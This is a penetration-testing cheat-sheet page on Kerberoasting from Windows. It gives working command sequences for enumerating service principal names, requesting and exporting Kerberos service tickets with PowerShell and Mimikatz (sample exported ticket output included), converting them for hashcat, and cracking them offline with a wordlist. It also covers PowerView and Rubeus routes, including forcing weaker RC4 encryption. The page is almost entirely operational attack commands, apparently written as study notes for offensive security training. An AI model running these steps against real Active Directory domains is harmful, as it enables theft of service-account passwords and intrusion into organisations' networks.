search
TwitterGithubLinkedinInstagramDiscord
githubEdit

Kerberoasting - From Windows

hashtag
Semi Manual Method

  • C:\> setspn.exe -Q */* β†’ lists various available SPNs

  • PS C:\> Add-Type -AssemblyName System.IdentityModel

  • PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL:1433"

We are requesting TGS tickets for an account and load them into memory to later extract using Mimikatz

  • PS C:\> setspn.exe -T DOMAIN.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } β†’ request tickets for all accounts with SPNs set.

Now lets extract tickets from mimikatz

Using 'mimikatz.log' for logfile : OK

mimikatz # base64 /out:true
isBase64InterceptInput  is false
isBase64InterceptOutput is true

mimikatz # kerberos::list /export

<SNIP>

[00000002] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 2/24/2022 3:36:22 PM ; 2/25/2022 12:55:25 AM ; 3/3/2022 2:55:25 PM
   Server Name       : MSSQLSvc/DEV-PRE-SQL:1433 @ DOMAIN.LOCAL
   Client Name       : USERNAME @ DOMAIN.LOCAL
   Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
====================
Base64 of file : 2-40a10000-USERNAME@MSSQLSvc~DEV-PRE-SQL~1433-DOMAIN.LOCAL.kirbi
====================
doIGPzCCBjugAwIBBaEDAgEWooIFKDCCBSRhggUgMIIFHKADAgEFoRUbE0lOTEFO
RUZSRUlHSFQuTE9DQUyiOzA5oAMCAQKhMjAwGwhNU1NRTFN2YxskREVWLVBSRS1T
UUwuaW5sYW5lZnJlaWdodC5sb2NhbDoxNDMzo4IEvzCCBLugAwIBF6EDAgECooIE
<...................SNIP...................>
LkxPQ0FMqTswOaADAgECoTIwMBsITVNTUUxTdmMbJERFVi1QUkUtU1FMLmlubGFu
ZWZyZWlnaHQubG9jYWw6MTQzMw==
====================

   * Saved to file     : 2-40a10000-USERNAME@MSSQLSvc~DEV-PRE-SQL~1433-DOMAIN.LOCAL.kirbi

<SNIP>

if we do not specify base64 /out:true , mimikatz will extract the tickets and write them to .kirbi files

  • decode this base64 Blob and save into file sqldev.kirbi

  • then use kirbi2john to extract Kerberos Ticket.

  • sed 's/\$krb5tgs\$(.*):\(.*\)/\$krb5tgs\$23\$\1\$\2/' crack_file > sqldev_tgs_hashcat β†’ modify the file/hash for Hashcat

    **$**krb5tgs$23$sqldev.kirbi$813149fb261549a6a1b38e71a057feeab β†’ it will look something like this

  • hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt β†’ finally cracking the hash.

hashtag
Automated / Tool Based Route

  • setspn.exe -Q */* β†’ list available spns

hashtag
Using PowerView

  • PS C:\> Import-Module .\PowerView.ps1 β†’ importing powerview

  • PS C:\> Get-DomainUser * -spn | select samaccountname β†’ getting spn account

  • PS C:\> Get-DomainUser -Identity username | Get-DomainSPNTicket -Format Hashcat β†’ Targeting Specific User

  • PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation β†’ Exporting All tickets to csv file

hashtag
Using Rubeus

Rubeus does not need us to explicitly set the SPN or the user.

  • PS C:\> .\Rubeus.exe kerberoast /stats β†’ get the stats

  • PS C:\> .\Rubeus.exe kerberoast

    we can add flag /nowrap so that hash will not be wrapped in any form so it will be easier to crack using hashcat.

    also we can use /outfile:filename to save the ticket, instead of displaying it.

  • PS C:\> .\Rubeus.exe kerberoast /user:testspn /nowrap β†’ for specific user.

we can use /tgtdeleg flag to specify that we want only RC4 encryption when requesting a new service ticket.

RC4 is easier to crack compared to AES 256 and 128

PreviousKerberoasting - From LinuxNextRED TEAMING

Last updated